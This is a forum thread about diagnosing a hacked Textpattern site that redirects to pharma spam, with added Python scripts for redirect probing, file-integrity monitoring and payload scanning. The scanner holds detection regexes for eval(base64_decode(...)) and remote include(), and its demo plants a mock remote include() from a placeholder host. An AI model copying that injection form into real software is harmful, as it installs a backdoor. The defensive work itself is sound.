Textpattern CMS support forum
#1 2010-08-20 00:38:31
- kevinpotts
- Member
- From: Ghost Coast
- Registered: 2004-12-07
- Posts: 370
Site Hacked / Link Hijacking - Need PHP Expert
So pages of my site have been hacked. Example: http://graphicpush.com/sincerity-clarity-brevity-in-that-order (Click on any link and it takes you to a Canadian pharma site.) I have combed through all of my forms and PHP files on the server and cannot find anything. Here’s what I have determined:
1.) .htaccess file is clean. Nothing wonky there.
2.) It is not JavaScript. I both disabled JS AND removed all JS from my pages and it’s still hijacked.
3.) It is not a plugin. I disabled them all and the behavior remains.
4.) It is not on every page of my site, but it is consistently on the one I referenced above.
This is clearly being done server-side. I don’t know how. This is the most interesting diagnostic I could find. All other code traces in Firebug and Chrome come up as “clean”.
Any clues? I will give access to server and TXP if necessary. I’d like to learn how this was done to help others in the future.
Kevin
(graphicpush)
Offline
#2 2010-08-20 01:39:08
- kevinpotts
- Member
- From: Ghost Coast
- Registered: 2004-12-07
- Posts: 370
Re: Site Hacked / Link Hijacking - Need PHP Expert
OK, update …
On my server, for a different site, I found a nasty .bin file wrapped up in base64 at the very end of publish.php. Obviously deleted that, but it didn’t help. I never found the reason for the above affected site, but I did a wholesale overwrite of the /textpattern/ directory and that fixed it. So that code was in there somewhere.
Also, I changed my FTP passwords. Good times.
Kevin
(graphicpush)
Offline
Re: Site Hacked / Link Hijacking - Need PHP Expert
The Admin -> Diagnostics tabs didn’t say anything interesting? no modified files?
Offline
#4 2010-08-20 01:56:56
- kevinpotts
- Member
- From: Ghost Coast
- Registered: 2004-12-07
- Posts: 370
Re: Site Hacked / Link Hijacking - Need PHP Expert
maniqui wrote:
The Admin -> Diagnostics tabs didn’t say anything interesting? no modified files?
That was the first thing I checked after I determined it wasn’t JS. Nothing. Weird, right?
Kevin
(graphicpush)
Offline
#5 2010-08-20 02:11:51
- wolfcry911
- Member
- From: MA, USA
- Registered: 2006-06-30
- Posts: 51
Re: Site Hacked / Link Hijacking - Need PHP Expert
You might want to read this post of noah stokes
http://esbueno.noahstokes.com/post/759171096/my-server-was-hacked
Offline
Re: Site Hacked / Link Hijacking - Need PHP Expert
Download all files from the server to your computer and search through the files for strange includes. I had a similar hack – at the end of all php/html files an include() was inserted.
Providing help in hacking ATM! Come to courses and don’t forget to bring us notebook and hammer! What for notebook? What a kind of hacker you are without notebook?
Offline
Re: Site Hacked / Link Hijacking - Need PHP Expert
Which version of TXP was installed?
Offline
#8 2010-08-20 12:28:32
- kevinpotts
- Member
- From: Ghost Coast
- Registered: 2004-12-07
- Posts: 370
Re: Site Hacked / Link Hijacking - Need PHP Expert
Download all files from the server to your computer and search through the files for strange includes. I had a similar hack – at the end of all php/html files an include() was inserted.
Yes, that is my next step. I used a few grep searches across all of my domains, but it’s not as conclusive as I want.
Which version of TXP was installed?
4.2.0. But Textpattern itself was not compromised, just the PHP files on the server.
Kevin
(graphicpush)
Offline
Re: Site Hacked / Link Hijacking - Need PHP Expert
It only redirects if the HTTP request contains a Referer: and User-agent: header and both of these have to pass certain minimum requirements, otherwise the redirect doesn’t happen. The referrer has to be one of the pages that shows these symptoms and the user-agent can’t be as simple as “mozilla/5.0”, but has to be longer. The target URL doesn’t seem to matter as long as it’s in the same domain… the redirect happens even if the target URL doesn’t exist, like http://graphicpush.com/doesntexist.
To check if some TXP file is involved, you could temporarily remove the .htaccess file, so textpattern doesn’t handle requests for files that don’t actually exist on the server, and then manually do an HTTP request and see if it still redirects. (Check before and after removing the .htaccess so you know you’re not doing it wrong.)
You can do the test manually from the command line:
telnet graphicpush.com 80
GET /doesntexist HTTP/1.1
Host: graphicpush.com
Connection: close
User-Agent: Mozilla/5.0 (something)
Referer: http://graphicpush.com/sincerity-clarity-brevity-in-that-order
Offline
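The manual telnet test above can be scripted so the same URL is requested twice, once with a bare user-agent and no Referer and once with the headers the post says trigger the redirect, and the two responses compared. The script below is an added example, not code from the thread: it builds the raw request exactly as typed in the telnet session, parses the status line and headers, and flags a 3xx whose Location points off the site's own domain. The two sample responses are constructed for offline testing; `pharma.example` is a placeholder, not a real redirect target.

```python
import socket
from urllib.parse import urlsplit

# Constructed sample responses for offline testing (not captured from the site).
CLEAN_RESPONSE = (b"HTTP/1.1 404 Not Found\r\nContent-Type: text/html\r\n"
                  b"Connection: close\r\n\r\n<html>not found</html>")
HIJACKED_RESPONSE = (b"HTTP/1.1 302 Found\r\nLocation: http://pharma.example/\r\n"
                     b"Connection: close\r\n\r\n")


def build_request(host, path, referer=None, user_agent="Mozilla/5.0 (something)"):
    """Raw HTTP/1.1 GET, mirroring the telnet session in the post."""
    lines = [f"GET {path} HTTP/1.1", f"Host: {host}",
             "Connection: close", f"User-Agent: {user_agent}"]
    if referer:
        lines.append(f"Referer: {referer}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_response(raw):
    """Split a raw response into (status code, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def classify(raw, host):
    """Describe whether the response redirects, and whether it leaves the site."""
    status, headers, _ = parse_response(raw)
    location = headers.get("location")
    if 300 <= status < 400 and location:
        # A relative Location stays on the site; an absolute one is checked by host.
        target_host = urlsplit(location).hostname or host
        if target_host.lower() != host.lower():
            return "off-site redirect to " + location
        return "on-site redirect to " + location
    return "no redirect (HTTP %d)" % status


def probe(host, path, referer, user_agent, port=80, timeout=10):
    """Send one request over a plain socket and classify the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_request(host, path, referer, user_agent))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return classify(b"".join(chunks), host)


def compare(host, path, referer, user_agent="Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/3.6"):
    """Same URL with and without the trigger headers; a difference means the
    redirect is conditional on Referer/User-Agent, as described in the post."""
    bare = probe(host, path, None, "Mozilla/5.0")
    full = probe(host, path, referer, user_agent)
    return {"bare": bare, "with_headers": full, "conditional": bare != full}


if __name__ == "__main__":
    import sys
    site = sys.argv[1] if len(sys.argv) > 1 else "graphicpush.com"
    print(compare(site, "/doesntexist",
                  f"http://{site}/sincerity-clarity-brevity-in-that-order"))
```

Run it once with the .htaccess in place and once with it removed, as the post suggests; if the "with_headers" result changes from an off-site redirect to a plain 404 only after the rewrite rules are gone, the redirect is coming from whatever the rewrite hands the request to.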
Re: Site Hacked / Link Hijacking - Need PHP Expert
How did it end?
Offline
#11 2010-08-27 02:29:07
- kevinpotts
- Member
- From: Ghost Coast
- Registered: 2004-12-07
- Posts: 370
Re: Site Hacked / Link Hijacking - Need PHP Expert
It’s not over. I overwrote the TXP files but the shit was back the next day. So with the help of Dreamhost’s tech support I tracked down a rogue .php file (cleverly named too) that was destroying graphicpush.com. I also found a nasty leach base64 script appended to index.php in the root of another site that was sticking about 100 pharma spam links to my HTML files. The amazing bit about this is that all of this cruft is completely invisible to the end user — but if you view the site as Google (this helped), it was like looking at a completely different site — like looking at a hotel room with infrared glasses and seeing all of the bacteria and insects crawling over the walls.
So now I am looking for a script that can monitor file activity across my sites. Any recommendations?
Kevin
(graphicpush)
Offline
Re: Site Hacked / Link Hijacking - Need PHP Expert
I don’t know of such a script that runs on the web server. After a similar situation to the one you experienced, we downloaded a copy of our sites to a local Mac (a PC would do just as well) and let NOD32 AV do its thing in the background. This uncovered some rogue files we hadn’t found. We keep this up, syncing the sites every now and again and also looking at the sync logs to see if any .php files update when they shouldn’t.
This is good stuff from Google, you likely have seen it already but the Monitoring your site health is sound advice and refers to the ‘Fetch as Googlebot’ facility you used.
Last edited by joebaich (2010-08-27 14:38:48)
Offline
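Two things asked for in this thread can be covered by one small script: the "search through the files for strange includes" advice in #6 and the file-activity monitoring Kevin asks for in #11 (and joebaich does by hand via sync logs in #12). The following is an added example, not code from the thread or from Textpattern: it records a SHA-256 manifest of a site tree, reports files added, removed or modified since the last manifest, and greps .php/.html files for the kind of appended payload described in the thread (a base64 blob fed to eval, or an include() of a remote URL). The `demo()` function builds a constructed site tree in a temporary directory and simulates the tampering so it runs offline; `pharma.example` and the file names are placeholders.

```python
import base64
import hashlib
import json
import os
import re
import tempfile

# Signatures for the payload shapes described in the thread. The long-blob
# pattern will also hit legitimate minified or inlined assets, so treat hits
# as things to read, not as proof of compromise.
SUSPICIOUS = [
    re.compile(rb"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\("),
    re.compile(rb"include(_once)?\s*\(?\s*['\"]https?://"),
    re.compile(rb"[A-Za-z0-9+/=]{200,}"),  # long base64-looking run
]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Map of site-relative path -> SHA-256 for every file under root."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest


def save_manifest(manifest, path):
    with open(path, "w") as f:
        json.dump(manifest, f, indent=1, sort_keys=True)


def load_manifest(path):
    with open(path) as f:
        return json.load(f)


def diff_manifests(baseline, current):
    """Files that appeared, vanished or changed since the baseline was taken."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }


def scan_for_payloads(root, exts=(".php", ".html")):
    """Return {relative path: [matched signature, ...]} for files worth reading."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "rb") as f:
                data = f.read()
            matched = [p.pattern.decode("ascii") for p in SUSPICIOUS if p.search(data)]
            if matched:
                hits[os.path.relpath(full, root)] = matched
    return hits


def _write(path, data):
    with open(path, "wb") as f:
        f.write(data)


def demo():
    """Constructed site tree: clean baseline, then simulated tampering."""
    with tempfile.TemporaryDirectory() as root:
        tp = os.path.join(root, "textpattern")
        os.makedirs(tp)
        _write(os.path.join(root, "index.php"), b"<?php include './textpattern/publish.php'; ?>\n")
        _write(os.path.join(tp, "publish.php"), b"<?php // clean publish.php stand-in\n")
        baseline = build_manifest(root)          # what you would save after a fresh install
        # Simulated tampering: payload appended to publish.php, plus a rogue new file.
        blob = base64.b64encode(b"x" * 160)      # inert 216-char base64 run
        with open(os.path.join(tp, "publish.php"), "ab") as f:
            f.write(b"\n<?php eval(base64_decode('" + blob + b"')); ?>\n")
        _write(os.path.join(tp, "cache.php"), b"<?php include('http://pharma.example/x.txt'); ?>\n")
        return diff_manifests(baseline, build_manifest(root)), scan_for_payloads(root)


if __name__ == "__main__":
    changes, hits = demo()
    print(json.dumps({"changes": changes, "hits": hits}, indent=1))
```

In use, take the manifest right after a clean overwrite of /textpattern/ and store it somewhere the web server cannot write to, then run the diff from cron or from the local copy joebaich describes; a modified publish.php or a new .php file in a directory that should not change is the signal, and the signature scan tells you which of the changed files to open first.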